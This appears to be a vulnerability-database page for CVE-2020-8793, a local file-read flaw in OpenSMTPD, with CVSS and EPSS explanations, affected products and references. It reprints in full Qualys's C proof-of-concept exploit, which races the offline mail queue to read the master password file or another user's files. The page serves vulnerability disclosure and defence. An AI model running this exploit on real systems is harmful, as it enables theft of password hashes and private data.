CVE-2020-8793 : Detail

CVE-2020-8793

4.7
/
Medium
A08-Soft and Data Integrity Fail
0.05%V3
Local
2020-02-25
15h22 +00:00
2020-04-13
20h06 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

OpenSMTPD before 6.6.4 allows local users to read arbitrary files (e.g., on some Linux distributions) because of a combination of an untrusted search path in makemap.c and race conditions in the offline functionality in smtpd.c.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition
The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the product to perform invalid actions when the resource is in an unexpected state.
CWE-426 Untrusted Search Path
The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

High

successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

None

There is no impact to availability within the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov
V2 4.7 AV:L/AC:M/Au:N/C:C/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 48139

Publication date : 2020-02-25 23h00 +00:00
Author : Qualys Corporation
EDB Verified : No

# Title: OpenSMTPD 6.6.3 - Arbitrary File Read # Date: 2020-02-20 # Author: qualys # Vendor: https://www.opensmtpd.org/ # CVE: 2020-8793 /* * Local information disclosure in OpenSMTPD (CVE-2020-8793) * Copyright (C) 2020 Qualys, Inc. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ #include <sys/types.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/sysctl.h> #include <sys/wait.h> #include <errno.h> #include <fcntl.h> #include <fts.h> #include <limits.h> #include <pwd.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define P_SUSPSIG 0x08000000 /* Stopped from signal. */ #define PATH_SPOOL "/var/spool/smtpd" #define PATH_OFFLINE "/offline" #define OFFLINE_QUEUEMAX 5 #define die() do { \ printf("died in %s: %u\n", __func__, __LINE__); \ exit(EXIT_FAILURE); \ } while (0) static const char * const * create_files(const size_t n_files) { size_t f; for (f = 0; f < n_files; f++) { char file[] = PATH_SPOOL PATH_OFFLINE "/0.XXXXXXXXXX"; const int fd = mkstemp(file); if (fd <= -1) die(); if (file[sizeof(file)-1] != '\0') die(); file[sizeof(file)-1] = '\n'; if (write(fd, file, sizeof(file)) != (ssize_t)sizeof(file)) die(); if (close(fd) != 0) die(); } const char ** const files = calloc(n_files, sizeof(char *)); if (files == NULL) die(); char * const paths[] = { PATH_SPOOL PATH_OFFLINE, NULL }; FTS * const fts = fts_open(paths, FTS_PHYSICAL | FTS_NOCHDIR, NULL); if (fts == NULL) die(); for (f = 0; ; ) { const FTSENT * const ent = fts_read(fts); if (ent == NULL) break; if (ent->fts_name[0] != '0') continue; if (ent->fts_name[1] != '.') continue; if (ent->fts_info != FTS_F) die(); if (ent->fts_level != 1) die(); if (ent->fts_statp->st_gid != ent->fts_parent->fts_statp->st_gid) die(); if (ent->fts_statp->st_size <= 0) die(); const char * const file = strdup(ent->fts_path); if (file == NULL) die(); if (f >= n_files) die(); files[f++] = file; } if (f != n_files) die(); if (fts_close(fts) != 0) die(); if (truncate(files[n_files - 1], 0) != 0) die(); return files; } static void wait_sentinel(const char * const * const files, const size_t n_files) { for (;;) { struct stat sb; if (lstat(files[n_files - 1], &sb) != 0) { if (errno != ENOENT) die(); return; } if (!S_ISREG(sb.st_mode)) die(); if (sb.st_size != 0) die(); } die(); } static void kill_wait(const pid_t pid) { if (kill(pid, SIGKILL) != 0) die(); int status = 0; if (waitpid(pid, &status, 0) != pid) die(); if (!WIFSIGNALED(status)) die(); if (WTERMSIG(status) != SIGKILL) die(); } typedef struct { int stop; pid_t pid; int fd; } t_stopper; static t_stopper fork_stopper(const uid_t uid) { const int stop = (uid == getuid()); int fds[2]; if (pipe(fds) != 0) die(); const pid_t pid = fork(); if (pid <= -1) die(); const int fd = fds[!pid]; if (close(fds[!!pid]) != 0) die(); if (pid != 0) { const t_stopper stopper = { .stop = stop, .pid = pid, .fd = fd }; return stopper; } int proc_mib[] = { CTL_KERN, KERN_PROC, KERN_PROC_RUID, uid, sizeof(struct kinfo_proc), 0 }; size_t proc_len = 0; if (sysctl(proc_mib, 6, NULL, &proc_len, NULL, 0) == -1) die(); if (proc_len <= 0) proc_len = sizeof(struct kinfo_proc); if (proc_len > ((size_t)1 << 20)) die(); const size_t proc_max = 0x10 * proc_len; void * const proc_buf = malloc(proc_max); if (proc_buf == NULL) die(); if (proc_mib[5] != 0) die(); proc_mib[5] = proc_max / sizeof(struct kinfo_proc); for (;;) { proc_len = proc_max; if (sysctl(proc_mib, 6, proc_buf, &proc_len, NULL, 0) == -1) die(); if (proc_len <= 0) { if (stop) die(); continue; } if (proc_len >= proc_max) die(); const struct kinfo_proc * kp; if (proc_len % sizeof(*kp) != 0) die(); for (kp = proc_buf; kp != proc_buf + proc_len; kp++) { if (*(const uint64_t *)kp->p_comm != *(const uint64_t *)"smtpctl") continue; if (kp->p_flag & P_SUSPSIG) continue; const pid_t pid = kp->p_pid; if (stop && kill(pid, SIGSTOP) != 0) continue; const int argv_mib[] = { CTL_KERN, KERN_PROC_ARGS, pid, KERN_PROC_ARGV }; static char argv_buf[ARG_MAX]; size_t argv_len = sizeof(argv_buf); if (sysctl(argv_mib, 4, argv_buf, &argv_len, NULL, 0) == -1) { continue; } if (argv_len <= sizeof(char *)) { if (stop) die(); continue; } if (argv_len >= sizeof(argv_buf)) die(); const char * const * const av = (const void *)argv_buf; size_t ac; for (ac = 0; av[ac] != NULL; ac++) { switch (ac) { case 0: if (strcmp(av[ac], "sendmail") != 0) die(); continue; case 1: if (strcmp(av[ac], "-S") != 0) die(); continue; case 2: if (stop) { if (strncmp(av[ac], PATH_SPOOL PATH_OFFLINE, sizeof(PATH_SPOOL PATH_OFFLINE)-1) != 0) die(); static const char ** stopped; static size_t i_stopped, n_stopped; size_t i; for (i = 0; i < i_stopped; i++) { if (strcmp(av[ac], stopped[i]) == 0) break; } if (i < i_stopped) break; if (i != i_stopped) die(); if (i_stopped >= n_stopped) { if (i_stopped != n_stopped) die(); if (n_stopped > ((size_t)1 << 20)) die(); n_stopped += ((size_t)1 << 10); stopped = reallocarray(stopped, n_stopped, sizeof(*stopped)); if (stopped == NULL) die(); } if (i_stopped >= n_stopped) die(); stopped[i_stopped] = strdup(av[ac]); if (stopped[i_stopped] == NULL) die(); i_stopped++; } const size_t len = strlen(av[ac]) + 1; if (write(fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die(); if (write(fd, av[ac], len) != (ssize_t)len) die(); break; default: die(); } break; } } } die(); } static void kill_stopper(const t_stopper stopper) { kill_wait(stopper.pid); if (close(stopper.fd) != 0) die(); } typedef struct { int kill; pid_t pid; char * args; } t_stopped; static t_stopped wait_stopped(const t_stopper stopper) { pid_t pid = 0; if (read(stopper.fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die(); if (pid <= 0) die(); static char buf[ARG_MAX]; size_t len = 0; for (;;) { if (len >= sizeof(buf)) die(); const ssize_t nbr = read(stopper.fd, buf + len, 1); if (nbr <= 0) die(); len += nbr; if (buf[len - 1] == '\0') break; } if (len <= 0) die(); if (memchr(buf, '\0', len) != buf + len - 1) die(); char * const args = strdup(buf); if (args == NULL) die(); const t_stopped stopped = { .kill = stopper.stop, .pid = pid, .args = args }; return stopped; } static void kill_free_stopped(const t_stopped stopped) { if (stopped.kill && kill(stopped.pid, SIGKILL) != 0) die(); free(stopped.args); } static void make_stopper_file(const char * const file) { const off_t file_size = (off_t)1 << 30; const off_t line_size = (off_t)1 << 20; struct stat sb; if (lstat(file, &sb) != 0) die(); if (!S_ISREG(sb.st_mode)) die(); if (sb.st_size <= 0) die(); if (sb.st_size >= line_size) { if (sb.st_size > file_size) return; die(); } const int fd = open(file, O_WRONLY | O_NOFOLLOW, 0); if (fd <= -1) die(); off_t l; for (l = 1; l <= file_size / line_size; l++) { if (lseek(fd, line_size, SEEK_END) <= l * line_size) die(); if (write(fd, "\n", 1) != 1) die(); } if (close(fd) != 0) die(); } static size_t find_stopped_file(const char * const * const files, const size_t n_files, const t_stopped stopped) { size_t f; for (f = 0; f < n_files; f++) { if (strcmp(files[f], stopped.args) == 0) { if (f >= n_files - 1) die(); return f; } } die(); } static void disclose_masterpasswd(const size_t n_files) { if (getuid() == 0) die(); const char * const * const files = create_files(n_files); size_t i; for (i = 0; i < n_files - 1; i++) { make_stopper_file(files[i]); } t_stopped queue_stopped[OFFLINE_QUEUEMAX]; size_t t = 0; size_t q; const t_stopper queue_stopper = fork_stopper(getuid()); puts("ready"); for (q = 0; q < OFFLINE_QUEUEMAX; q++) { queue_stopped[q] = wait_stopped(queue_stopper); const size_t f = find_stopped_file(files, n_files, queue_stopped[q]); printf("%zu (%zu)\n", f, q); if (f >= t) t = f + 1; } kill_stopper(queue_stopper); if (t < OFFLINE_QUEUEMAX) die(); if (t >= n_files - 1) die(); wait_sentinel(files, n_files); for (i = 0; i < n_files - 1; i++) { if (unlink(files[i]) != 0) die(); if (i < t) continue; if (link(_PATH_MASTERPASSWD, files[i]) != 0) die(); const pid_t pid = fork(); if (pid <= -1) die(); if (pid == 0) { char * const argv[] = { "/usr/bin/chpass", NULL }; char * const envp[] = { "EDITOR=echo '#' >>", NULL }; execve(argv[0], argv, envp); die(); } int status = 0; if (waitpid(pid, &status, 0) != pid) die(); if (!WIFEXITED(status)) die(); if (WEXITSTATUS(status) != 0) die(); struct stat sb; if (lstat(files[i], &sb) != 0) die(); if (!S_ISREG(sb.st_mode)) die(); if (sb.st_nlink != 1) die(); if (sb.st_uid != 0) die(); } const t_stopper target_dumper = fork_stopper(0); for (q = 0; q < OFFLINE_QUEUEMAX; q++) { kill_free_stopped(queue_stopped[q]); } const t_stopped target_dump = wait_stopped(target_dumper); puts(target_dump.args); kill_free_stopped(target_dump); kill_stopper(target_dumper); for (i = t; i < n_files - 1; i++) { if (unlink(files[i]) != 0) die(); } exit(EXIT_SUCCESS); } static void make_stopper_files(const char * const * const files, const size_t n_files, const size_t begin_stoppers, const size_t n_stoppers) { if (begin_stoppers >= n_files) die(); if (n_stoppers > OFFLINE_QUEUEMAX) die(); const size_t end_stoppers = begin_stoppers + 3 * n_stoppers; if (end_stoppers >= n_files) die(); size_t f; for (f = begin_stoppers; f < end_stoppers; f++) { make_stopper_file(files[f]); } } typedef struct { pid_t pid; int fd; } t_swapper; static t_swapper fork_swapper(const char * const target, const char * const file) { struct stat sb; if (lstat(target, &sb) != 0) die(); if (!S_ISREG(sb.st_mode)) die(); if (sb.st_nlink != 1) die(); int fds[2]; if (pipe(fds) != 0) die(); const pid_t pid = fork(); if (pid <= -1) die(); const int fd = fds[!pid]; if (close(fds[!!pid]) != 0) die(); if (pid != 0) { const t_swapper swapper = { .pid = pid, .fd = fd }; return swapper; } if (unlink(file) != 0) die(); if (write(fd, "A", 1) != 1) die(); for (;;) { if (link(target, file) != 0) die(); if (unlink(file) != 0) die(); } die(); } static void wait_swapper(const t_swapper swapper) { char buf[] = "whatever"; if (read(swapper.fd, buf, sizeof(buf)) != 1) die(); if (buf[0] != 'A') die(); } static void kill_swapper(const t_swapper swapper) { kill_wait(swapper.pid); if (close(swapper.fd) != 0) die(); } static void disclose_deadletter(const size_t n_files, const char * const target) { struct stat target_sb; if (target[0] != '/') die(); if (lstat(target, &target_sb) != 0) die(); if (!S_ISREG(target_sb.st_mode)) die(); if (target_sb.st_nlink != 1) die(); const uid_t target_uid = target_sb.st_uid; if (target_uid == getuid()) die(); const struct passwd * const target_pw = getpwuid(target_uid); if (target_pw == NULL) die(); static char deadletter[PATH_MAX]; snprintf(deadletter, sizeof(deadletter), "%s/dead.letter", target_pw->pw_dir); struct stat deadletter_sb; if (lstat(deadletter, &deadletter_sb) != 0) { if (errno != ENOENT) die(); memset(&deadletter_sb, 0, sizeof(deadletter_sb)); } const char * const * const files = create_files(n_files); make_stopper_files(files, n_files, 0, OFFLINE_QUEUEMAX); const t_stopper queue_stopper = fork_stopper(getuid()); puts("ready"); t_stopped queue_stopped[OFFLINE_QUEUEMAX]; size_t t = 0; size_t q; for (q = 0; q < OFFLINE_QUEUEMAX; q++) { queue_stopped[q] = wait_stopped(queue_stopper); const size_t f = find_stopped_file(files, n_files, queue_stopped[q]); printf("%zu (%zu)\n", f, q); if (f >= t) t = f + 1; } if (t < OFFLINE_QUEUEMAX) die(); if (t >= n_files - 1) die(); size_t i; for (i = 0; i < t; i++) { if (unlink(files[i]) != 0) die(); } wait_sentinel(files, n_files); const t_stopper target_dumper = fork_stopper(target_uid); for (;;) { make_stopper_files(files, n_files, t + 1, 1); const t_swapper swapper = fork_swapper(target, files[t]); wait_swapper(swapper); kill_free_stopped(queue_stopped[0]); queue_stopped[0] = wait_stopped(queue_stopper); kill_swapper(swapper); const size_t f = find_stopped_file(files, n_files, queue_stopped[0]); printf("%zu\n", f); if (f <= t) die(); for (i = t; i <= f; i++) { if (unlink(files[i]) != 0) { if (errno != ENOENT) die(); if (i != t) die(); } } t = f + 1; struct stat sb; if (lstat(deadletter, &sb) != 0) { if (errno != ENOENT) die(); memset(&sb, 0, sizeof(sb)); } if (memcmp(&sb, &deadletter_sb, sizeof(sb)) != 0) break; } kill_stopper(queue_stopper); const t_stopped target_dump = wait_stopped(target_dumper); puts(target_dump.args); kill_free_stopped(target_dump); kill_stopper(target_dumper); for (i = t; i < n_files - 1; i++) { if (unlink(files[i]) != 0) die(); } for (q = 0; q < OFFLINE_QUEUEMAX; q++) { kill_free_stopped(queue_stopped[q]); } char * const argv[] = { "/bin/ls", "-l", deadletter, NULL }; char * const envp[] = { NULL }; execve(argv[0], argv, envp); die(); } int main(const int argc, const char * const argv[]) { setlinebuf(stdout); puts("Local information disclosure in OpenSMTPD (CVE-2020-8793)"); puts("Copyright (C) 2020 Qualys, Inc."); if (argc <= 1) die(); const size_t n_files = strtoul(argv[1], NULL, 0); if (n_files <= OFFLINE_QUEUEMAX) die(); if (n_files > ((size_t)1 << 20)) die(); if (argc == 2) { disclose_masterpasswd(n_files); die(); } if (argc == 3) { disclose_deadletter(n_files, argv[2]); die(); } die(); }

Products Mentioned

Configuraton 0

Opensmtpd>>Opensmtpd >> Version To (excluding) 6.6.4

Configuraton 0

Fedoraproject>>Fedora >> Version 32

Configuraton 0

Canonical>>Ubuntu_linux >> Version 18.04

Canonical>>Ubuntu_linux >> Version 19.10

References

http://www.openwall.com/lists/oss-security/2020/02/24/4
Tags : mailing-list, x_refsource_MLIST
http://seclists.org/fulldisclosure/2020/Feb/28
Tags : mailing-list, x_refsource_FULLDISC
https://usn.ubuntu.com/4294-1/
Tags : vendor-advisory, x_refsource_UBUNTU